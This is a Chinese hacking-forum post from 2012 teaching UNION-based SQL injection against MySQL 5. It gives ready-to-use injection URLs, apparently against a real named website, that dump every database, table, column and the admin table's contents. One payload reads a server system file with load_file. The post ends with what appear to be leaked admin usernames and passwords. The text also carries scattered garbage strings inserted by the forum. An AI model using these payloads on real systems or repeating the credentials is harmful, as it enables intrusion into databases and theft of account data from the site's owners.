找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2284|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
, O2 \3 \5 z" D) z7 ^1 G+ L% y* i但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人8 u! Z$ d3 `' ~
; d! B& q  k7 E  c- P

7 W# r! X( w: [: W5 E优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入. u1 x  B9 c2 j5 ]+ D. l2 r

1 q! c  H" Z8 T* b& u* f缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
" w& k! Z9 q  z* r
- M0 |+ R7 r. w: c, @2 |$ E4 f0 _下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
/ l2 X6 v, ]2 B% k/ n在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等+ ?. ^3 ]; A$ y/ j
* R# X) v0 g' @6 [; v( F2 p
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
1 Z, M" O; y. X* ]6 J# _! q& x) Z3 u* A; @, c# ?
读出所有库:
& J5 a( b+ @* l6 V* B# |http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
9 _1 D& x# ~- ^% i) d9 A8 K" ~% z; R% [9 g. c; `7 t
. T5 s# H8 ^& v, l

, b" }) C: J0 f7 G7 m# i# [读出所有表:
. z  [8 S8 v" k% ?- ~3 ?6 Khttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()3 g) S/ t/ K2 U) v

6 |. H: E) A6 Y1 a& W读出所有表字段:6 N5 l& l+ G& }& n. P7 l
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
1 ~! G4 V0 I( l/ j*/ (97,100,109,105,110)为admin的ascii码 依次类推
/ i. K3 F. M+ f4 w% S6 a: _% R2 U6 g% c0 f4 T8 F& i$ l
读出所有表字段里的内容:' B4 K+ C7 C1 ^6 \7 r  B! b
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin6 n  p# b; P! J

3 I1 I' a- F, S' S" ^  G$ c- W; J9 m- F! n$ l. `! s: H
; D& E2 i) z8 h
5 S- U( V) A: ], J" x- P3 }/ y. A
6 a* h$ ]$ r7 x0 f4 e; e; v

' R( d6 }4 V: `http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%233 a0 d3 S$ ~8 X1 t, z' N0 K  R
- J5 f" T# v% T& S

( O" T' I) v: P5 l" uhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
9 x: D4 W) W3 t) G1 ?2 i
! P0 @9 @( W' l9 t- v) T. Dhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
* ]1 D* v; w2 N3 s1 }- {
0 j4 i- X4 p, s
8 k1 \2 |. h. M, i, B- A# Thttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23+ a6 E* |6 m+ j0 i; X; N# c

. A* |, n$ h, ]% ~  p
* s( f( A, f3 g2 _' }  O, @  g        webmaster:dzb521123,simlab:simadmin200432330 O0 x' y7 ~  h: c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表